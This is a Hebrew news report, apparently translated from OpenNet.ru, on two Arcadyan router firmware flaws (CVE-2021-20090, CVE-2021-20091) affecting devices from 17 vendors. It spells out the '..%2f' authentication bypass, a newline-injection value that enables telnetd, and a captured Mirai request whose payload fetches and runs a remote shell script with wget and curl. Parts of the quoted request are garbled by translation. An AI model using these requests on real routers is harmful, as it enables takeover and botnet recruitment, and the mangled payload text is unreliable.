פגיעות בנתבים ביתיים המשפיעה על 17 יצרנים

התקפה מסיבית נרשמה ברשת נגד נתבים ביתיים שהקושחה שלהם משתמשת ביישום שרת HTTP של חברת Arcadyan. כדי להשיג שליטה על מכשירים, נעשה שימוש בשילוב של שתי נקודות תורפה המאפשרות ביצוע מרחוק של קוד שרירותי עם זכויות שורש. הבעיה משפיעה על מגוון רחב למדי של נתבי ADSL מבית Arcadyan, ASUS ו-Buffalo, כמו גם מכשירים המסופקים תחת המותגים Beeline (הבעיה מאושרת ב-Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ו מפעילי טלקום אחרים. יצוין כי הבעיה קיימת בקושחה של Arcadyan כבר יותר מ-10 שנים ובמהלך תקופה זו הצליחה לעבור ל-20 דגמי מכשירים לפחות מ-17 יצרנים שונים.

הפגיעות הראשונה, CVE-2021-20090, מאפשרת לגשת לכל סקריפט של ממשק אינטרנט ללא אימות. מהות הפגיעות היא שבממשק האינטרנט, חלק מהספריות שדרכן נשלחות תמונות, קבצי CSS וסקריפטים של JavaScript נגישות ללא אימות. במקרה זה, ספריות שעבורן מותרת גישה ללא אימות נבדקות באמצעות המסכה הראשונית. ציון תווי "../" בנתיבים למעבר לספריית האב חסומה על ידי הקושחה, אך השימוש בשילוב "..%2f" נדלג. לפיכך, ניתן לפתוח דפים מוגנים בעת שליחת בקשות כמו "http://192.168.1.1/images/..%2findex.htm".

הפגיעות השנייה, CVE-2021-20091, מאפשרת למשתמש מאומת לבצע שינויים בהגדרות המערכת של המכשיר על ידי שליחת פרמטרים בפורמט מיוחד לסקריפט application_abstract.cgi, שאינו בודק את נוכחותו של תו חדש בפרמטרים . לדוגמה, בעת ביצוע פעולת פינג, תוקף יכול לציין את הערך "192.168.1.2%0AARC_SYS_TelnetdEnable=1" בשדה עם כתובת ה-IP המסומנת, והסקריפט, בעת יצירת קובץ ההגדרות /tmp/etc/config/ .glbcfg, יכתוב את השורה "AARC_SYS_TelnetdEnable=1" לתוכו ", מה שמפעיל את שרת telnetd, המספק גישה למעטפת פקודה בלתי מוגבלת עם זכויות שורש. באופן דומה, על ידי הגדרת הפרמטר AARC_SYS, אתה יכול להפעיל כל קוד במערכת. הפגיעות הראשונה מאפשרת להריץ סקריפט בעייתי ללא אימות על ידי גישה אליו בתור "/images/..%2fapply_abstract.cgi".

כדי לנצל נקודות תורפה, תוקף חייב להיות מסוגל לשלוח בקשה ליציאת הרשת שבה ממשק האינטרנט פועל. אם לשפוט לפי הדינמיקה של התפשטות המתקפה, מפעילים רבים משאירים גישה במכשיריהם מהרשת החיצונית כדי לפשט את האבחון של בעיות על ידי שירות התמיכה. אם הגישה לממשק מוגבלת רק לרשת הפנימית, ניתן לבצע התקפה מרשת חיצונית בטכניקת "DNS rebinding". פגיעויות כבר נמצאות בשימוש פעיל לחיבור נתבים ל-Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 חיבור: סגור User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

מקור: OpenNet.ru